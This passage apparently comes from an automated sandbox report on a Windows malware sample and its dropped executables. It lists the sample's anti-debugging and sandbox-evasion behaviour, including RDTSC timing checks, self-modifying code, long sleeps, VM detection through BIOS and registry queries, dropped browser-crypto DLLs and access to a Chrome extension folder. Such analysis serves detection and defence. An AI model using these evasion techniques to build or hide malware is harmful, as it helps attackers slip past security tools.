Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7922E9 second address: 7922ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 770D77 second address: 770D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 770D7D second address: 770D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 770D89 second address: 770DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FECC512635Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FECC5126356h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 770DA6 second address: 770DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 74A86A second address: 74A86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 74A86E second address: 74A8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FECC5476B3Bh 0x0000000c pushad 0x0000000d jmp 00007FECC5476B30h 0x00000012 jmp 00007FECC5476B34h 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a jl 00007FECC5476B26h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BBECE second address: 7BBED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BBED4 second address: 7BBEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BBEDA second address: 7BBEFC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FECC512635Ch 0x00000011 jmp 00007FECC512635Ah 0x00000016 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BC1B4 second address: 7BC1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BC1BF second address: 7BC1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BC1C3 second address: 7BC1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FECC5476B2Dh 0x0000000e rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BC1D9 second address: 7BC1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FECC5126356h 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7BC38C second address: 7BC391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 745855 second address: 74586C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FECC5126362h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 74586C second address: 74588C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jp 00007FECC5476B26h 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FECC5476B26h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7C66BB second address: 7C66BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7C66BF second address: 7C66C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7C6B39 second address: 7C6B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126366h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7C6B58 second address: 7C6B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7C7562 second address: 7C7571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC512635Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CA4E0 second address: 7CA4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CA4E4 second address: 7CA4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CA4ED second address: 7CA4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CA4F9 second address: 7CA507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CA507 second address: 7CA50C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CA50C second address: 7CA512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CA512 second address: 7CA518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CE8D6 second address: 7CE8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC512635Bh 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBAEBFIIEC.exe RDTSC instruction interceptor: First address: 7CE8E5 second address: 7CE8F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1282B2F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10AFA25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1260D82 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12E1D6D instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Special instruction interceptor: First address: 5DEC59 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Special instruction interceptor: First address: 5DED3A instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Special instruction interceptor: First address: 781634 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Special instruction interceptor: First address: 80B7A1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FEEC59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FEED3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1191634 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 121B7A1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Special instruction interceptor: First address: 825AB2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Special instruction interceptor: First address: 9C855A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Special instruction interceptor: First address: 8230C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Special instruction interceptor: First address: 9D755D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Special instruction interceptor: First address: A51F04 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Special instruction interceptor: First address: 668BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Special instruction interceptor: First address: 8055D2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Special instruction interceptor: First address: 668B32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Special instruction interceptor: First address: 12E2B2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Special instruction interceptor: First address: 110FA25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Special instruction interceptor: First address: 12C0D82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Special instruction interceptor: First address: 1341D6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Special instruction interceptor: First address: B8DD45 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Special instruction interceptor: First address: B8DCC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Special instruction interceptor: First address: D30295 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Special instruction interceptor: First address: D54C28 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Special instruction interceptor: First address: DC060A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Special instruction interceptor: First address: 60FDD45 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Special instruction interceptor: First address: 60FDCC0 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Memory allocated: 5240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Memory allocated: 5540000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Memory allocated: 5380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Memory allocated: 51F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Memory allocated: 54A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Memory allocated: 51F0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_04DD0380 rdtsc 9_2_04DD0380
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 529 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 8206 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window / User API: threadDelayed 3298 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window / User API: threadDelayed 3869 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Window / User API: threadDelayed 710
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7368 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7372 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7344 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7356 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7440 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2588 Thread sleep count: 59 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2588 Thread sleep time: -118059s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2008 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2008 Thread sleep time: -116058s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6352 Thread sleep count: 278 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6352 Thread sleep time: -8340000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3888 Thread sleep count: 59 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3888 Thread sleep time: -118059s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916 Thread sleep time: -122061s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5740 Thread sleep count: 529 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5740 Thread sleep time: -1058529s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6872 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5740 Thread sleep count: 8206 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5740 Thread sleep time: -16420206s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 7124 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 7124 Thread sleep time: -130065s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 7028 Thread sleep count: 64 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 7028 Thread sleep time: -128064s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 171 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 229 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 167 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 115 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 213 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 104 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 95 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6980 Thread sleep count: 96 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 1104 Thread sleep count: 79 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 1104 Thread sleep time: -158079s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6192 Thread sleep count: 3298 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6192 Thread sleep time: -6599298s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 7156 Thread sleep count: 3869 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 7156 Thread sleep time: -7741869s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6384 Thread sleep count: 62 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe TID: 6384 Thread sleep time: -124062s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 7400 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 7400 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 5932 Thread sleep time: -88044s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 2128 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 3152 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 5324 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 2540 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 5164 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 772 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 3484 Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe TID: 7656 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe TID: 7076 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 6748 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe TID: 1436 Thread sleep time: -150000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\EBAEBFIIEC.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C56C930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: skotes.exe, skotes.exe, 0000000B.00000002.2293226797.0000000001174000.00000040.00000001.01000000.0000000D.sdmp, 5a20612cd1.exe, 0000000F.00000002.2574231478.00000000007E6000.00000040.00000001.01000000.0000000F.sdmp, 0882197cda.exe, 00000010.00000002.2676985278.0000000001299000.00000040.00000001.01000000.00000010.sdmp, 5a20612cd1.exe, 00000011.00000002.3290918350.00000000007E6000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
